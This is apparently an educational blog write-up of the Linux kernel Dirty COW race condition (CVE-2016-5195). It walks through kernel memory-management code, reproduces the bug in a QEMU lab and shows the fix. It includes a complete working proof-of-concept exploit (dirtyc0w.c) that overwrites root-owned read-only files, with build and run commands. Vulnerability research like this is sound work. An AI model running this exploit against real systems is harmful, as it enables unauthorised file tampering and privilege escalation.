CVE-2016-5195: Dirty COW
Note
Dirty COW may well be the finest race condition vulnerability out there. Although I have been reading the kernel for a while, I still have not worked up the courage to study low-level machinery like the page cache. I hope this serves as a constant reminder that dangerous vulnerabilities hide in that code too.
Original Post
This time we take a look at a very, very famous bug: the Dirty COW vulnerability.
Abstract
CVE-2016-5195, also known as Dirty COW, is an infamous race condition bug in the Linux kernel.
After some googling, I found that this blog post by chao-tic ranks first in elaborating the full details. I recommend watching the video presented by LiveOverflow first, then reading this post before you dive into chao-tic's.
If you are interested in its internals or want to exploit it, this post should be helpful :P.
This post uses the Linux 4.4.0 kernel as an example; other versions may differ.
Understanding the Bug
The most practical way to understand the bug is to learn how the exploit works. Before doing that, we need to review some kernel-related knowledge.
Copy On Write (COW)
Copy-on-write is an optimization technique adopted in Linux memory management. For example, when a process asks the kernel for memory pages, the kernel just adjusts some metadata (a vm_area_struct, for instance); the real page is not allocated or copied until a page fault is triggered.
Shared resource management, databases, and the like also rely on this technique.
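As a concrete illustration, here is a minimal userspace sketch (assuming a non-empty readable file named foo exists in the current directory): a MAP_PRIVATE file mapping is copy-on-write, so the first write faults and the kernel copies the page, leaving the file on disk untouched.
// cow_demo.c -- a minimal sketch of COW on a private file mapping.
// Assumption: a non-empty readable file "foo" exists in the current directory.
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("foo", O_RDONLY);
    // PROT_WRITE on a read-only fd is fine here: MAP_PRIVATE means our
    // writes never reach the file, only a private copy of the page.
    char *map = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    map[0] = 'X';            // page fault -> kernel copies the page (COW)
    printf("%c\n", map[0]);  // our mapping sees 'X'; the file is unchanged
    munmap(map, 4096);
    close(fd);
    return 0;
}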
/proc/self/mem
People know about the /proc filesystem, but /proc/self/mem is a relatively uncommon corner of it. In general, /proc/pid/mem is a binary image representing the process's virtual memory[^4]. One concise answer I like comes from Stack Exchange:
/proc/$pid/mem shows the contents of $pid’s memory mapped the same way as in the process, i.e., the byte at offset x in the pseudo-file is the same as the byte at address x in the process.
Generally, we are not bothered with this /proc/$$/mem stuff directly; ptrace and other debugger machinery wrap it for us. The related file operations are defined in proc_mem_operations in the Linux kernel (fs/proc/base.c).
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};
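To see the pseudo-file in action, here is a hedged sketch (again assuming a non-empty readable file foo): even though the mapping below is PROT_READ only, writing through /proc/self/mem succeeds, because mem_write() takes the forced-write path that the exploit later abuses.
// procmem_demo.c -- writing to our own read-only mapping via /proc/self/mem.
// Assumption: a readable file "foo" (at least 3 bytes) exists here.
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("foo", O_RDONLY);
    char *map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);

    int mem = open("/proc/self/mem", O_RDWR);
    // Offset x in the pseudo-file is address x in the process, so we
    // seek to the mapping's address and write through it. A direct
    // map[0] = 'a' would segfault, but this write goes through.
    pwrite(mem, "abc", 3, (off_t)(uintptr_t)map);

    printf("%.3s\n", map);   // prints "abc": a private COW copy changed,
                             // the underlying file did not
    return 0;
}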
Okay, before digging into the internals of writing to /proc/self/mem, here is another important component of this vulnerability: the madvise syscall.
madvise
Be sure that your kernel is compiled with CONFIG_ADVISE_SYSCALLS.
Here is an excerpt from the system call manual:
The madvise() system call is used to give advice or directions to the kernel about the address range beginning at address addr and with size length bytes. Initially, the system call supported a set of “conventional” advice values, which are also available on several other implementations. (Note, though, that madvise() is not specified in POSIX.) Subsequently, a number of Linux-specific advice values have been added.
Hmm, advice from the user sounds quite dangerous.
MADV_DONTNEED: Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)
So far so good: the user who owns the resource can advise the kernel that they won't use it in the near future, and the kernel can act on that advice to optimize resource management.
Let's look at the comment above madvise_dontneed() in the source code (mm/madvise.c):
/*
* Application no longer needs these pages. If the pages are dirty,
* it's OK to just throw them away. The app will be more careful about
* data it wants to keep. Be sure to free swap resources too. The
* zap_page_range call sets things up for shrink_active_list to actually free
* these pages later if no one else has touched them in the meantime,
* although we could add these pages to a global reuse list for
* shrink_active_list to pick up before reclaiming other pages.
*
* NB: This interface discards data rather than pushes it out to swap,
* as some implementations do. This has performance implications for
* applications like large transactional databases which want to discard
* pages in anonymous maps after committing to backing store the data
* that was kept in them. There is no reason to write this data out to
* the swap area if the application is discarding it.
*
* An interface that causes the system to free clean pages and flush
* dirty pages is already available as msync(MS_INVALIDATE).
*/
static long madvise_dontneed(struct vm_area_struct *vma,
struct vm_area_struct **prev,
unsigned long start, unsigned long end)
{...}
In conclusion, if the pages advised with the MADV_DONTNEED flag are dirty, the kernel will just throw them away, as the sketch below demonstrates. You can check this blog if you are not familiar with dirty pages.
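Here is a minimal sketch of that behavior on an anonymous private mapping: after MADV_DONTNEED, the dirty page is discarded, and the next access faults in a fresh zero-filled page.
// dontneed_demo.c -- MADV_DONTNEED throws away our dirty anonymous page.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    strcpy(p, "hello");                 // dirties the page
    printf("before: '%s'\n", p);        // "hello"
    madvise(p, 4096, MADV_DONTNEED);    // kernel drops the dirty page
    printf("after:  '%s'\n", p);        // "": next access gets a zero page
    munmap(p, 4096);
    return 0;
}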
Cool, let’s combine what we have in hand.
Racing
With the help of dynamic debugging, we find that writing to /proc/self/mem leads to the __get_user_pages() function, defined in mm/gup.c:
mem_write() => mem_rw() => access_remote_vm() => __access_remote_vm() => get_user_pages() => get_user_pages_locked() => __get_user_pages()
Let’s have a glance at this function.
// mm/gup.c __get_user_pages()
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
/* ...skip... */
do {
struct page *page;
/* ...skip... */
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
/* ...skip... */
} while (nr_pages);
/* ...skip... */
}
The page is returned by the follow_page_mask() function, whose descriptive comment is quoted below. This function walks the page tables to find the page descriptor.
follow_page_mask - look up a page descriptor from a user-virtual address
Supposing we are writing to a read-only region, follow_page_mask() runs into this check:
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
That is to say, a NULL pointer is returned, and __get_user_pages() then calls faultin_page(). The follow-up process is fairly complex, so we skip it and focus on the trace supplied by the CVE details:
faultin_page
handle_mm_fault
__handle_mm_fault
handle_pte_fault
FAULT_FLAG_WRITE && !pte_write
do_wp_page
PageAnon() <- this is CoWed page already
reuse_swap_page <- page is exclusively ours
wp_page_reuse
maybe_mkwrite <- dirty but RO again
ret = VM_FAULT_WRITE
In brief, writing to the read-only area causes faultin_page() to create a COW page marked dirty, so the write does not affect the original content.
Question: why not just raise an error when writing to a read-only page? The answer is indeed debugger support: the write goes through the forced path (FOLL_FORCE) precisely so that ptrace and friends can poke read-only memory, e.g. to plant breakpoints in a text segment.
When faultin_page() finishes its job, it removes the FOLL_WRITE flag from foll_flags to avoid another call to faultin_page() after the goto retry in __get_user_pages(). That is to say, with FOLL_WRITE removed, the next follow_page_mask() call returns the freshly created COW page instead of a NULL pointer.
// mm/gup.c faultin_page()
/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
Without the FOLL_WRITE flag, it seems follow_page_mask() goes deeper and calls the vm_normal_page() function to obtain the newly allocated copy page.
Well, we know there are tons of gotos in kernel source code. This flag-removal trick is pretty Linux, but also dangerous. Imagine the following scenario: one thread keeps writing to a read-only mapping while another thread keeps madvising the kernel to abandon it. The expected sequence is shown below.
write(f, str, strlen(str))    |
        ||                    |
        \/                    |
__get_user_pages(...)         |
        ||                    |
        \/                    |
follow_page_mask(...)         |
  [return NULL]               |
        ||                    |
        \/                    |
faultin_page(...)             |
  [create dirty COW page]     |
  [eliminate FOLL_WRITE]      |
        ||                    |
        \/                    |
follow_page_mask(...)         |
  [return COWed page]         |
                              |  madvise(map,100,MADV_DONTNEED)
                              |          ||
                              |          \/
                              |  zap_page_range(...)
                              |    [Drop the dirty COWed page]
However, without spinlock protection around these steps, an attacker can race them into the sequence below.
write(f, str, strlen(str))    |
        ||                    |
        \/                    |
__get_user_pages(...)         |
        ||                    |
        \/                    |
follow_page_mask(...)         |
  [return NULL]               |
        ||                    |
        \/                    |
faultin_page(...)             |
  [create dirty COW page]     |
  [eliminate FOLL_WRITE]      |
                              |
                              |  madvise(map,100,MADV_DONTNEED)
                              |          ||
                              |          \/
                              |  zap_page_range(...)
                              |    [Drop the dirty COWed page]
                              |
                              |
follow_page_mask(...)         |
  [get the real page cache!]  |
That is because the re-entered follow_page_mask() only checks (flags & FOLL_WRITE) && !pte_write(pte) to decide whether to refuse the page. FOLL_WRITE has been removed, so it returns the real page: the page cache page backing the read-only file mapping. The kernel then writes our payload into that page and marks it dirty, and the writeback machinery eventually pushes the change to the file on disk, even though we never had write permission.
Exploiting the Bug
There are many scripts supplied on the official website that you can use to hijack a vulnerable machine. Here we pick the classic one, condensed below. To emulate an OS, we can use QEMU (a virtual machine also works). In addition, you can use buildroot to quickly set up a qemu+Linux+buildroot environment.
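The sketch below is my condensed take on the classic dirtyc0w.c PoC (error handling stripped; the authoritative version lives on the official site): one thread hammers the mapping with MADV_DONTNEED while the other keeps writing the payload through /proc/self/mem.
// dirtyc0w.c (condensed) -- two racing threads against a read-only mapping.
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;
static char *payload;

static void *madvise_thread(void *arg)
{
    for (int i = 0; i < 100000000; i++)
        madvise(map, 100, MADV_DONTNEED);      // keep dropping the COW copy
    return NULL;
}

static void *procselfmem_thread(void *arg)
{
    int f = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 100000000; i++) {
        lseek(f, (off_t)(uintptr_t)map, SEEK_SET);
        write(f, payload, strlen(payload));    // race: may hit the real page
    }
    return NULL;
}

int main(int argc, char *argv[])
{
    pthread_t pth1, pth2;
    struct stat st;
    int f = open(argv[1], O_RDONLY);           // the root-owned target file

    payload = argv[2];
    fstat(f, &st);
    // Read-only private mapping: writes are supposed to hit a COW copy only.
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);

    pthread_create(&pth1, NULL, madvise_thread, NULL);
    pthread_create(&pth2, NULL, procselfmem_thread, NULL);
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}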
Preparing Busybox
Here we target the ARM architecture. This blog will help you set up everything you need, like the cross-compile toolchain, the initramfs, and so on.
Booting Linux
I just show the commands here; make sure you have everything set up first.
$ wget -c https://github.com/torvalds/linux/archive/v4.4.tar.gz
$ tar xvf v4.4.tar.gz
$ cd linux-4.4
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- vexpress_defconfig
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- all -j4
After you get the zImage, you can cross-compile the dirtyc0w exploit; remember to put it into your initramfs. (The PoC uses pthreads, hence -lpthread; -static keeps it runnable in a minimal initramfs.)
$ arm-linux-gnueabi-gcc -static dirtyc0w.c -o dirtyc0w -lpthread
$ cp dirtyc0w {YOUR_INITRAMFS_DIRECTORY} && cd {YOUR_INITRAMFS_DIRECTORY}
$ find . | cpio -H newc -o > {TARGET_INITRAMFS_PATH}
Okay, we then use qemu to start booting.
qemu-system-arm -M vexpress -dtb linux-4.4/arch/arm/boot/dts/vexpress-v2p-ca9.dtb -kernel {ZIMAGE PATH} -initrd {TARGET_INITRAMFS_PATH} -nographic -append "earlyprintk=serial,ttyS0 console=ttyAMA0"
After you have a Linux shell, just create a file that can only be written by root, and then su to your unprivileged hacker user.
$ echo 'aaaaa' > foo
$ chmod 744 foo
$ su hacker
$ echo 'bbb' > foo
sh: can't create foo: Permission denied
$ cat foo
aaaaa
$ ./dirtyc0w foo bbb
.....
^C
$ cat foo
bbbaa
Boom! We wrote to that file with our own payload.
Patching
The patch for this CVE is rather simple.
diff --git a/include/linux/mm.h b/include/linux/mm.h
index e9caec6..ed85879 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -2232,6 +2232,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
#define FOLL_TRIED 0x800 /* a retry, previous pass started an IO */
#define FOLL_MLOCK 0x1000 /* lock present pages */
#define FOLL_REMOTE 0x2000 /* we are working on non-current tsk/mm */
+#define FOLL_COW 0x4000 /* internal GUP flag */
typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
void *data);
diff --git a/mm/gup.c b/mm/gup.c
index 96b2b2f..22cc22e 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -60,6 +60,16 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
return -EEXIST;
}
+/*
+ * FOLL_FORCE can write to even unwritable pte's, but only
+ * after we've gone through a COW cycle and they are dirty.
+ */
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+ return pte_write(pte) ||
+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
@@ -95,7 +105,7 @@ retry:
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
- if ((flags & FOLL_WRITE) && !pte_write(pte)) {
+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
@@ -412,7 +422,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
- *flags &= ~FOLL_WRITE;
+ *flags |= FOLL_COW;
return 0;
}
The key idea of this patch is to no longer remove the FOLL_WRITE flag when faultin_page() finishes; instead it sets a new flag, FOLL_COW. The check in follow_page_pte() now calls can_follow_write_pte(), which returns true only if the pte is already writable, or if we are in a forced COW cycle (FOLL_FORCE and FOLL_COW both set) and the pte is dirty. If madvise drops the COW page in the race window, the retried lookup faults in a fresh, clean page; pte_dirty() is then false, so can_follow_write_pte() fails and the kernel simply COWs the page again instead of handing out the real page cache page.